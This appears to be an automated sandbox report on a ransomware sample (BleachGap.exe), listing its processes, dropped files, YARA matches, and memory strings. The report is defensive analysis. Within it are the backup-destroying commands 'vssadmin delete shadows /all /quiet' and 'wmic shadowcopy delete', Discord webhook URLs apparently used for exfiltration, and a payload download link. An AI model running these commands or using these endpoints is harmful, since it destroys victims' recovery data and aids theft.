Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49724 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: yb.pdbr source: powershell.exe, 00000025.00000002.292537088.0000028CAE9C9000.00000004.00000020.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000025.00000002.307231149.0000028CC8A6A000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\paulej\Documents\Source\AESCrypt\Windows\Console\Win32\Release\aescrypt.pdb source: BleachGap.exe, 00000000.00000002.549484552.0000000000B40000.00000004.00000001.sdmp, BleachGap.exe, 00000011.00000003.425794983.0000000002770000.00000004.00000001.sdmp, aescrypt.exe.0.dr
Source:	Binary string: .pdbZ source: powershell.exe, 00000025.00000002.292537088.0000028CAE9C9000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000025.00000002.307231149.0000028CC8A6A000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\paulej\Documents\Source\AESCrypt\Windows\Console\Win32\Release\aescrypt.pdb source: BleachGap.exe, 00000000.00000002.549484552.0000000000B40000.00000004.00000001.sdmp, BleachGap.exe, 00000011.00000003.425794983.0000000002770000.00000004.00000001.sdmp, aescrypt.exe.0.dr

Spreading:

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001A4696 GetFileAttributesW,FindFirstFileW,FindClose,	34_2_001A4696
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001AC93C FindFirstFileW,FindClose,	34_2_001AC93C
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001AC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	34_2_001AC9C7
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001AF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	34_2_001AF200
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001AF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	34_2_001AF35D
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001AF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	34_2_001AF65E
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001A3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	34_2_001A3A2B
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001A3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	34_2_001A3D4E
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001ABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	34_2_001ABF27

Source: C:\Users\user\Desktop\BleachGap.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\BleachGap.exe	File opened: C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.tmp	Jump to behavior
Source: C:\Users\user\Desktop\BleachGap.exe	File opened: C:\Users\user\AppData\Local\Temp\1C7E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\BleachGap.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\BleachGap.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\BleachGap.exe	File opened: C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp	Jump to behavior

Networking:

Source: Joe Sandbox View

IP Address: 162.159.135.232 162.159.135.232

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001B25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

34_2_001B25E2

Source: unknown

DNS traffic detected: queries for: discord.com

Source: DiscordSendWebhook.exe, 00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp	String found in binary or memory: http://Webhook1URL.com
Source: DiscordSendWebhook.exe, 00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp	String found in binary or memory: http://Webhook2URL.com
Source: DiscordSendWebhook.exe, 00000022.00000002.250787434.0000000000C17000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000025.00000002.306773289.0000028CC879C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DiscordSendWebhook.exe, 00000022.00000002.250787434.0000000000C17000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: DiscordSendWebhook.exe, 00000022.00000002.250787434.0000000000C17000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: DiscordSendWebhook.exe, 00000022.00000002.250787434.0000000000C17000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: powershell.exe, 00000025.00000002.302217287.0000028CC0547000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: DiscordSendWebhook.exe, 00000022.00000002.250787434.0000000000C17000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: DiscordSendWebhook.exe, 00000022.00000002.250787434.0000000000C17000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000025.00000003.283107917.0000028CC8740000.00000004.00000001.sdmp, powershell.exe, 00000025.00000002.293430267.0000028CB05B1000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000025.00000002.293047197.0000028CB03A1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DiscordSendWebhook.exe, 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp, DiscordSendWebhook.exe.0.dr	String found in binary or memory: http://www.Phoenix125.comD
Source: DiscordSendWebhook.exe, 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp, DiscordSendWebhook.exe.0.dr	String found in binary or memory: http://www.Phoenix125.comX
Source: powershell.exe, 00000025.00000003.283107917.0000028CC8740000.00000004.00000001.sdmp, powershell.exe, 00000025.00000002.293430267.0000028CB05B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: DiscordSendWebhook.exe, 00000022.00000002.250787434.0000000000C17000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: DiscordSendWebhook.exe, 00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp	String found in binary or memory: http://www.phoenix125.com/DiscordAvatar.jpg
Source: 1C80.bat.0.dr	String found in binary or memory: https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe
Source: powershell.exe, 00000025.00000002.302217287.0000028CC0547000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000025.00000002.302217287.0000028CC0547000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000025.00000002.302217287.0000028CC0547000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000025.00000003.283359368.0000028CC8801000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/803443573722710047/DHTqigSoy72GqbbicAGvijeiMetfkvr8QL0UVyVIb
Source: powershell.exe, 00000025.00000002.292313796.0000028CAE952000.00000004.00000020.sdmp, 1C80.bat.0.dr	String found in binary or memory: https://discord.com/api/webhooks/803443573722710047/DHTqigSoy72GqbbicAGvijeiMetfkvr8QL0UVyVIbp-4tehV
Source: 1C80.bat.0.dr	String found in binary or memory: https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FY
Source: DiscordSendWebhook.exe, 00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp	String found in binary or memory: https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS
Source: DiscordSendWebhook.exe, 00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp	String found in binary or memory: https://discordapp.com/api/webhooks/987654321098765432/6543210987654321ZYXWVUTSRQPONMLKJIHGFEDCBAzyx
Source: powershell.exe, 00000025.00000003.283107917.0000028CC8740000.00000004.00000001.sdmp, powershell.exe, 00000025.00000002.293430267.0000028CB05B1000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: DiscordSendWebhook.exe, 00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp, DiscordSendWebhook.exe.0.dr	String found in binary or memory: https://github.com/phoenix125
Source: powershell.exe, 00000025.00000002.302217287.0000028CC0547000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: DiscordSendWebhook.exe, 00000022.00000002.250787434.0000000000C17000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: DiscordSendWebhook.exe, 00000022.00000002.250787434.0000000000C17000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown

HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49724 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001B425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

34_2_001B425A

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

34_2_001B425A

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001A0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

34_2_001A0219

Source: BleachGap.exe, 00000011.00000002.426333329.000000000085A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001CCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

34_2_001CCDAC

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Ransomware_Generic

Show sources

Source: Yara match	File source: 00000011.00000003.425889191.0000000002767000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.550028845.0000000002790000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.549851514.0000000002590000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.425898742.0000000000810000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.549865164.00000000025A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.425881894.0000000002760000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BleachGap.exe PID: 3292, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\47B6.bat, type: DROPPED

Yara detected Snatch Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: BleachGap.exe PID: 3292, type: MEMORY

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: unknown	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: unknown	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: BleachGap.exe, 00000000.00000002.550028845.0000000002790000.00000004.00000040.sdmp	Binary or memory string: vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: vssadmin.exe, 00000006.00000002.204749645.00000220B1DE0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe, 00000006.00000002.204749645.00000220B1DE0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe, 00000006.00000002.204749645.00000220B1DE0000.00000002.00000001.sdmp	Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe, 00000006.00000002.204749645.00000220B1DE0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe, 00000006.00000002.204749645.00000220B1DE0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Source: vssadmin.exe, 00000006.00000002.204757687.00000220B1DF0000.00000004.00000020.sdmp	Binary or memory string: C:\Users\user\AppData\Local\Temp\C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quietvssadmin delete shadows /all /quietWinsta0\Default
Source: vssadmin.exe, 00000006.00000002.204757687.00000220B1DF0000.00000004.00000020.sdmp	Binary or memory string: vssadmin delete shadows /all /quiet
Source: vssadmin.exe, 00000006.00000002.204803949.00000220B20E4000.00000004.00000040.sdmp	Binary or memory string: vssadmindeleteshadows/all/quiet=4
Source: BleachGap.exe, 00000011.00000003.425889191.0000000002767000.00000004.00000040.sdmp	Binary or memory string: vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: vssadmin.exe, 00000015.00000002.228657668.000002264DB20000.00000004.00000020.sdmp	Binary or memory string: C:\Users\user\AppData\Local\Temp\C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quietvssadmin delete shadows /all /quietWinsta0\DefaultF
Source: vssadmin.exe, 00000015.00000002.228657668.000002264DB20000.00000004.00000020.sdmp	Binary or memory string: vssadmin delete shadows /all /quiet
Source: vssadmin.exe, 00000015.00000002.228638056.000002264DAC0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe, 00000015.00000002.228638056.000002264DAC0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe, 00000015.00000002.228638056.000002264DAC0000.00000002.00000001.sdmp	Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe, 00000015.00000002.228638056.000002264DAC0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe, 00000015.00000002.228638056.000002264DAC0000.00000002.00000001.sdmp	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Source: vssadmin.exe, 00000015.00000002.228747289.000002264DD64000.00000004.00000040.sdmp	Binary or memory string: vssadmindeleteshadows/all/quiet
Source: 1C80.bat.0.dr	Binary or memory string: vssadmin delete shadows /all /quiet

May disable shadow drive data (uses vssadmin)

Show sources

Source: unknown	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: unknown	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior

System Summary:

Binary is likely a compiled AutoIt script file

Show sources

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: This is a third-party compiled AutoIt script.	34_2_00143B4C
Source: DiscordSendWebhook.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: DiscordSendWebhook.exe, 00000022.00000000.247368021.00000000001F5000.00000002.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: DiscordSendWebhook.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: DiscordSendWebhook.exe.0.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001A4021: CreateFileW,DeviceIoControl,CloseHandle,

34_2_001A4021

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_00198858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

34_2_00198858

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001A545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

34_2_001A545F

Source: C:\Users\user\Desktop\BleachGap.exe	Code function: 0_2_0040E800	0_2_0040E800
Source: C:\Users\user\Desktop\BleachGap.exe	Code function: 0_2_0040C838	0_2_0040C838
Source: C:\Users\user\Desktop\BleachGap.exe	Code function: 0_2_0040F1CA	0_2_0040F1CA
Source: C:\Users\user\Desktop\BleachGap.exe	Code function: 0_2_004105F0	0_2_004105F0
Source: C:\Users\user\Desktop\BleachGap.exe	Code function: 0_2_00411250	0_2_00411250
Source: C:\Users\user\Desktop\BleachGap.exe	Code function: 0_2_00410673	0_2_00410673
Source: C:\Users\user\Desktop\BleachGap.exe	Code function: 0_2_004102D0	0_2_004102D0
Source: C:\Users\user\Desktop\BleachGap.exe	Code function: 0_2_0040B2E7	0_2_0040B2E7
Source: C:\Users\user\Desktop\BleachGap.exe	Code function: 0_2_004102F0	0_2_004102F0
Source: C:\Users\user\Desktop\BleachGap.exe	Code function: 0_2_004106B9	0_2_004106B9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Code function: 17_2_0040E800	17_2_0040E800
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Code function: 17_2_0040C838	17_2_0040C838
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Code function: 17_2_0040F1CA	17_2_0040F1CA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Code function: 17_2_004105F0	17_2_004105F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Code function: 17_2_00411250	17_2_00411250
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Code function: 17_2_00410673	17_2_00410673
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Code function: 17_2_004102D0	17_2_004102D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Code function: 17_2_0040B2E7	17_2_0040B2E7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Code function: 17_2_004102F0	17_2_004102F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Code function: 17_2_004106B9	17_2_004106B9
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0014E800	34_2_0014E800
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001633C7	34_2_001633C7
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0016DBB5	34_2_0016DBB5
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0014FE40	34_2_0014FE40
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001C804A	34_2_001C804A
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0014E060	34_2_0014E060
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00154140	34_2_00154140
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00162405	34_2_00162405
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00176522	34_2_00176522
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0017267E	34_2_0017267E
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001C0665	34_2_001C0665
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0016283A	34_2_0016283A
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00156843	34_2_00156843
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001789DF	34_2_001789DF
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00158A0E	34_2_00158A0E
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00176A94	34_2_00176A94
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001C0AE2	34_2_001C0AE2
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001A8B13	34_2_001A8B13
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0019EB07	34_2_0019EB07
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0016CD61	34_2_0016CD61
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00177006	34_2_00177006
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0015710E	34_2_0015710E
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00153190	34_2_00153190
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00141287	34_2_00141287
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0016F419	34_2_0016F419
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00155680	34_2_00155680
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001616C4	34_2_001616C4
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001678D3	34_2_001678D3
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001558C0	34_2_001558C0
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00161BB8	34_2_00161BB8
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00179D05	34_2_00179D05
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_00161FD0	34_2_00161FD0
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0016BFE6	34_2_0016BFE6

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\1C7E.tmp\DiscordSendWebhook.exe B116FF00546620A598119D6704E9849393D2F9948FC8888D6DDF6211AA5B80B9
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe B68FC901D758BA9EA3A5A616ABD34D1662197AA31B502F27CBF2579A947E53E9
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe B116FF00546620A598119D6704E9849393D2F9948FC8888D6DDF6211AA5B80B9
